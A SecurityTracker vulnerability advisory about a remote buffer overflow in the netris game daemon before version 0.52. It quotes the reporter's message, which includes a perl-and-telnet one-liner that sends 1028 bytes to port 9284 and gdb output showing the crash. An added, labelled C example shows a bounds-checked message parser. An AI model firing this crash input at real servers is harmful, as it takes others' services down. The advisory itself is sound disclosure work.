SecurityTracker.com
Category:  Application (Game)  >  netris
Vendors:  Weaver, Mark H.
netris Game Buffer Overflow Lets Remote Users Crash the Daemon
SecurityTracker Alert ID:  1007544
CVE Reference:  CAN-2002-1566
Date:  Aug 21 2003
Impact:  Denial of service via network
Fix Available:  Yes
Exploit Included:  Yes
Vendor Confirmed:  Yes
Version(s):  prior to 0.52
Description:  A buffer overflow vulnerability was reported in the netris game. A remote user can cause the game to crash.

It was reported [in September 2002] that when netris is run with the '-w' command line option (i.e., the wait option), a remote user can connect to the target system on TCP port 9284 and send a long string to cause the netris daemon on the target server to crash.

A demonstration exploit command is provided:

perl -e '{print "a"x"1028"}' | telnet localhost 9284

Impact:  A remote user can cause the netris daemon to crash.
Solution:  The vendor has released a fixed version (0.52), available at:

ftp://ftp.netris.org/pub/netris/

Vendor URL:  www.netris.org/
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  Artur Byszko / bajkero <bajkero@security.hack.pl>
Message History:   None.
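
The boundary-error class named under "Cause", shown as an added C example that is not netris source code and not part of the original advisory: a receive path that checks a peer-declared length against its fixed buffer before copying. The 4-byte type/length header, the 1024-byte buffer, and every name below are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MSG_CAP 1024  /* assumed size of the fixed receive buffer */
#define HDR_LEN 4     /* hypothetical header: 2-byte type, 2-byte length */

enum { MSG_OK = 0, MSG_SHORT = -1, MSG_TOO_BIG = -2 };

struct msg {
    uint16_t type;
    uint16_t len;                 /* payload bytes actually stored */
    unsigned char data[MSG_CAP];
};

/* Parse one framed message from untrusted bytes. The declared length is
 * checked against the destination capacity and against the bytes that
 * really arrived before anything is copied. */
int parse_msg(const unsigned char *in, size_t in_len, struct msg *out)
{
    if (in_len < HDR_LEN)
        return MSG_SHORT;
    uint16_t type = (uint16_t)((in[0] << 8) | in[1]);
    uint16_t len  = (uint16_t)((in[2] << 8) | in[3]);
    if ((size_t)len > sizeof out->data)
        return MSG_TOO_BIG;       /* the check a boundary error omits */
    if ((size_t)len > in_len - HDR_LEN)
        return MSG_SHORT;         /* peer declared more than it sent */
    out->type = type;
    out->len = len;
    memcpy(out->data, in + HDR_LEN, len);
    return MSG_OK;
}

/* Constructed sample: the 1028-byte run of 'a' used in the advisory. */
int parse_long_string(void)
{
    unsigned char in[1028];
    struct msg m;
    memset(in, 'a', sizeof in);
    return parse_msg(in, sizeof in, &m);
}

int main(void)
{
    printf("1028 x 'a' -> %d\n", parse_long_string());
    return 0;
}
```

With this framing the run of 'a' bytes decodes to a declared length of 0x6161, so the message is rejected before any copy takes place.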


 Source Message Contents

Date:  Mon, 9 Sep 2002 06:55:38 +0200
From:  Artur Byszko / bajkero <bajkero@security.hack.pl>
Subject:  netris-0.5.

 



Hi.

I found a remote bug in the latest version of netris (0.5)..

(apocalypse:~)% gdb netris
GNU gdb 4.18 (FreeBSD)
[..]
(gdb) r -w
Starting program: /usr/local/bin/netris -w
(no debugging symbols found)...(no debugging symbols found)...


***
on second terminal:
(apocalypse:~)% perl -e '{print "a"x"1028"}' | telnet localhost 9284
***

Your opponent is using an old, incompatible version
of Netris.  They should get the latest version.
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28138fd5 in getenv () from /usr/lib/libc.so.4


Exploit code is still under development.. ;)

Sorry for my terrible English.

best regards,
-- 
* Artur Byszko * \x62\x61\x6a\x6b\x65\x72\x6f *


Copyright 2002, SecurityGlobal.net LLC